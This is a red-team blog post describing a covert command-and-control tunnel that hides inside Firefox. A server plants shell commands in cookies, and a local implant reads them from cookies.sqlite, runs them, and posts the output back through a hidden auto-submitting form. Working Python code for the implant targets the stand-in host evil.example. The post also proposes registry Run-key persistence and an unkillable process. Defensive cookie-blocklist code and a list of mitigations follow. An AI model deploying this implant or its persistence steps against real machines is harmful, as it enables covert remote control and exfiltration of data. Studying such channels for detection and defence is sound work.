Saturday, December 23, 2017

Firefox tunnel

A crucial element of a Red Team engagement is stealth. Its success depends on adopting an attacker's mindset: when the red team wins, that uncompromising cracker's point of view helps the Blue Team build a better defence afterwards. Don't be put off by this content; everything here has a practical purpose.

This blog post describes a different approach to remotely controlling a machine while bypassing the firewall. There are many tools for that job, such as the Veil framework and msfvenom, but sometimes following a different path brings good results.

The attack uses Firefox itself as the channel between client and server. Doing that with hooks is not impossible, but DLL injection is tedious to implement and hard to make portable: x86 and x64 each need a different approach (later I discovered that the EasyHook API could solve that). One day I was studying Firefox internals and read about its use of SQLite to store cookies, which gave me a different focus.
Look at the following:

[Diagram: plan of the Firefox tunnel]

That is the complete plan for a program that uses Firefox as a tunnel. I will explain each step:

1- The tunnel program launches the Firefox browser in hidden mode with a URL pointing at the malicious server; that server replies with a cookie whose value is a command.

2- The tunnel reads the evil server's cookie from cookies.sqlite and runs its value in the command shell.

3- The output of the command is written into an HTML page whose JavaScript auto-submits a form containing the result.

4- The program opens that HTML page in hidden mode, so Firefox posts the command output back to the malicious server.
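The four steps above, as an added example in Python; this is not the firefox_tunnel project's code, which targets Windows natively. It assumes a simplified moz_cookies schema, a constructed cookie database, a hypothetical C2 host evil.example with a cookie named cmd, and uses Firefox's -headless flag as a stand-in for the hidden window of the original.

```python
"""Added example (not the firefox_tunnel project's own code): the client side of
the cookie tunnel. Hosts, cookie name and schema are assumptions for the example."""
import base64
import html
import os
import shutil
import sqlite3
import subprocess
import tempfile

# Firefox's real cookies.sqlite has more columns; this fixture keeps only the
# ones the tunnel needs (assumption: simplified schema, constructed here).
MOZ_COOKIES_DDL = """
CREATE TABLE moz_cookies (
    id INTEGER PRIMARY KEY, name TEXT, value TEXT, host TEXT, path TEXT,
    expiry INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER)
"""


def make_fixture_db(path):
    """Constructed cookies.sqlite: one benign cookie and one command cookie
    planted by the hypothetical C2 host evil.example (step 1's result)."""
    con = sqlite3.connect(path)
    con.executescript(MOZ_COOKIES_DDL)
    con.executemany(
        "INSERT INTO moz_cookies(name,value,host,path,expiry,creationTime,isSecure,isHttpOnly)"
        " VALUES (?,?,?,?,?,?,?,?)",
        [("sid", "abc123", ".mail.example", "/", 2000000000, 1514000000000000, 1, 1),
         ("cmd", "echo tunnel-test", "evil.example", "/", 2000000000, 1514000000000000, 0, 0)])
    con.commit()
    con.close()


def snapshot_cookie_db(profile_db):
    """Copy cookies.sqlite plus its -wal file (Firefox keeps the DB in WAL mode,
    so the newest writes may only be in the WAL) to a temp dir, so the tunnel
    never fights the running browser for the original file."""
    copy = os.path.join(tempfile.mkdtemp(), "cookies.sqlite")
    shutil.copy(profile_db, copy)
    wal = profile_db + "-wal"
    if os.path.exists(wal):
        shutil.copy(wal, copy + "-wal")
    return copy


def read_command_cookie(profile_db, c2_host, cookie_name="cmd"):
    """Step 2a: return the C2 cookie's value, or None if no command is waiting.
    Firefox stores domain cookies with a leading dot, so both forms are checked."""
    con = sqlite3.connect(snapshot_cookie_db(profile_db))
    row = con.execute(
        "SELECT value FROM moz_cookies WHERE host IN (?, ?) AND name = ?",
        (c2_host, "." + c2_host, cookie_name)).fetchone()
    con.close()
    return row[0] if row else None


def run_command(cmd):
    """Step 2b: run the cookie value in the command shell; return stdout+stderr."""
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def build_autosubmit_html(c2_url, output):
    """Step 3: a page whose JavaScript auto-submits the output on load.
    The output is base64-encoded so arbitrary shell output cannot break the form."""
    payload = base64.b64encode(output.encode()).decode()
    return ("<html><body onload=\"document.forms[0].submit()\">"
            f"<form method=\"POST\" action=\"{html.escape(c2_url, quote=True)}\">"
            f"<input type=\"hidden\" name=\"result\" value=\"{payload}\">"
            "</form></body></html>")


def firefox_argv(target):
    """Steps 1 and 4: argv to open a URL or local file without a visible window.
    The original used a hidden window; -headless (Firefox 56+) is an assumed substitute."""
    return ["firefox", "-headless", target]


def demo():
    """Whole round trip on the constructed database; returns the intermediate values."""
    db = os.path.join(tempfile.mkdtemp(), "cookies.sqlite")
    make_fixture_db(db)
    cmd = read_command_cookie(db, "evil.example")
    output = run_command(cmd) if cmd else ""
    page = build_autosubmit_html("http://evil.example/result", output)
    return {"cmd": cmd, "output": output, "page": page,
            "launch": firefox_argv("file:///tmp/result.html")}


if __name__ == "__main__":
    print(demo()["page"])
```

The snapshot step matters in practice: reading the live file can be blocked by the browser's lock, and a copy that omits cookies.sqlite-wal can miss the cookie the server just set.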


Now you can look at the following:

[Figure]

To round this off, I wrote the code and recorded a proof of concept; nothing makes a point like seeing it work. You can find everything at the following:

https://github.com/convisoappsec/firefox_tunnel



Future insights:

 *Add persistence: use RegOpenKeyEx() to open the key "Software\Microsoft\Windows\CurrentVersion\Run" and RegSetValueEx() to write a value that launches the program automatically at system startup.

 *Use images as the I/O channel, with steganography.

 *Run the process in hidden mode.

 *Make the tunnel an unkillable process.


Possible mitigations:

* Global hooking of OpenFile() and CreateFile() to inspect the file-name argument for "cookies.sqlite" and block the call when the calling program's path is not firefox.exe.

* A file-watch API to monitor the cookie database for writes.

* A program that periodically opens the cookie database and searches for suspicious domains or hosts, using a blocklist, and removes the evil cookie with a DELETE query.
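The third mitigation, as an added example in Python (not the blog's code): it scans a cookie database for hosts on a blocklist, matching subdomains and the leading-dot form Firefox uses for domain cookies, and deletes the hits. The schema is simplified, and the cookies and blocklist are constructed for the example.

```python
"""Added example (not the blog's own code): periodic scan-and-delete of cookies
from blocklisted hosts. Schema, hosts and blocklist are constructed here."""
import os
import sqlite3
import tempfile

# Simplified moz_cookies schema (assumption; the real table has more columns).
MOZ_COOKIES_DDL = """
CREATE TABLE moz_cookies (
    id INTEGER PRIMARY KEY, name TEXT, value TEXT, host TEXT, path TEXT,
    expiry INTEGER, creationTime INTEGER)
"""


def make_fixture_db(path):
    """Constructed database: one benign cookie, two from the hypothetical C2."""
    con = sqlite3.connect(path)
    con.executescript(MOZ_COOKIES_DDL)
    con.executemany(
        "INSERT INTO moz_cookies(name,value,host,path,expiry,creationTime) VALUES (?,?,?,?,?,?)",
        [("sid", "abc123", ".mail.example", "/", 2000000000, 1514000000000000),
         ("cmd", "whoami", "evil.example", "/", 2000000000, 1514000000000000),
         ("cmd", "dir", ".c2.evil.example", "/", 2000000000, 1514000000000000)])
    con.commit()
    con.close()


def host_blocked(host, blocklist):
    """True if the cookie host is a blocklisted domain or a subdomain of one.
    The leading dot Firefox adds to domain cookies is stripped before matching."""
    h = host.lstrip(".").lower()
    return any(h == b or h.endswith("." + b) for b in blocklist)


def find_evil_cookies(db_path, blocklist):
    """Return (id, host, name, value) for every cookie from a blocklisted host."""
    con = sqlite3.connect(db_path)
    rows = con.execute("SELECT id, host, name, value FROM moz_cookies").fetchall()
    con.close()
    return [r for r in rows if host_blocked(r[1], blocklist)]


def delete_cookies(db_path, ids):
    """Remove the flagged rows with a parameterised DELETE; returns rows deleted."""
    con = sqlite3.connect(db_path)
    cur = con.executemany("DELETE FROM moz_cookies WHERE id = ?", [(i,) for i in ids])
    con.commit()
    deleted = cur.rowcount
    con.close()
    return deleted


def scan_and_clean(db_path, blocklist):
    """One sweep: find cookies from blocklisted hosts, delete them, report both."""
    flagged = find_evil_cookies(db_path, blocklist)
    deleted = delete_cookies(db_path, [r[0] for r in flagged]) if flagged else 0
    return flagged, deleted


def remaining_hosts(db_path):
    con = sqlite3.connect(db_path)
    hosts = [r[0] for r in con.execute("SELECT host FROM moz_cookies ORDER BY id")]
    con.close()
    return hosts


def demo():
    """Run the sweep on the constructed database with a constructed blocklist."""
    db = os.path.join(tempfile.mkdtemp(), "cookies.sqlite")
    make_fixture_db(db)
    flagged, deleted = scan_and_clean(db, blocklist={"evil.example"})
    return {"flagged": flagged, "deleted": deleted, "remaining": remaining_hosts(db)}


if __name__ == "__main__":
    print(demo())
```

Run the sweep while Firefox is closed: the browser keeps its cookies in memory, so a row deleted from the file does not remove the cookie from a running session. A blocklist only catches hosts you already know; for an unknown C2 domain, combine it with an allowlist of expected cookie hosts or with the file-watch approach above.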




Thank you for reading this. Cheers!
